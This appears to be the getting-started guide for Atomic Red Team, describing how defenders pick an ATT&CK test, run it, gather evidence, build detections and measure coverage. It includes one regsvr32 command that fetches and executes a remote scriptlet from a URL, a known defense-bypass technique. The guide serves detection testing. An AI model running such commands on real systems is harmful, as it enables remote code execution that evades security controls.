Getting Started Testing with Atomic Tests

We suggest a phased approach to running a test and evaluating your results:

  1. Select a test
  2. Execute Test
  3. Collect Evidence
  4. Develop Detection
  5. Measure Progress

Best Practices

Select a test

Select one or more Atomic Tests that you plan to execute. A complete list, ATT&CK matrices, and platform-specific matrices linking to Atomic Tests can be found here:

Execute Test

In this example we will use Technique T1117 "Regsvr32" and Atomic Test "Regsvr32 remote COM scriptlet execution". This particular test is fairly easy to exercise since the tool is on all Windows workstations by default.

The details of this test, which are located here, describe how you can test your detection by simply running the below command:

regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll

Collect Evidence

What does your security solution observe?

This is why we test! We want to identify visibility gaps and determine where we need to make improvements.

RC Timeline

Cb example 1

Cb Example 2

Develop Detection

So you executed the test and none of your defenses fired – that’s why we test! Based on your observations and detection capabilities, it is time to use what you have to try to detect this event in your environment.

Unwind Data

Once the detection is built, it is time to validate that the detection is working and that it is appropriately tuned. If you were to write your detection too broadly and “detect” every regsvr32.exe without any suppression, you are going to be digging out from a mountain of false positives. But if you write it too narrow and it only detects regsvr32.exe with the exact command line /s /u /i then all an attacker has to do is slightly modify their command line to evade your detection.

Measure Progress

One of the goals is to try to measure your coverage/capabilities against the ATT&CK Matrix and to identify where you may have gaps. Roberto Rodriguez (@cyb3rWar0g) provided this spreadsheet and complementary blog post showcasing how to determine where you stand within your organization in relation the MITRE ATT&CK Matrix.

HeatMap

Measure